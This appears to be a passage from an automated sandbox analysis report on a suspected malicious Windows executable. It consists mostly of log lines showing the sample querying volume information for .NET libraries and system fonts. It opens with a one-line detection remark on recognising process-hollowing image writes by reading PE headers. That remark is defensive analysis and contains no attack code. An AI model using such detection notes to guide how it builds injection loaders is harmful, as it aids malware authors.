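          The "value starts with: 4D5A" test alone is weak (any MZ prefix passes); walking to the PE signature and reading ImageBase is what separates a real image write from a stray buffer, and it is the same walk a hollowing loader performs before it maps the sections.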
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Users\user\Desktop\Q4YODvoYjL.exe VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
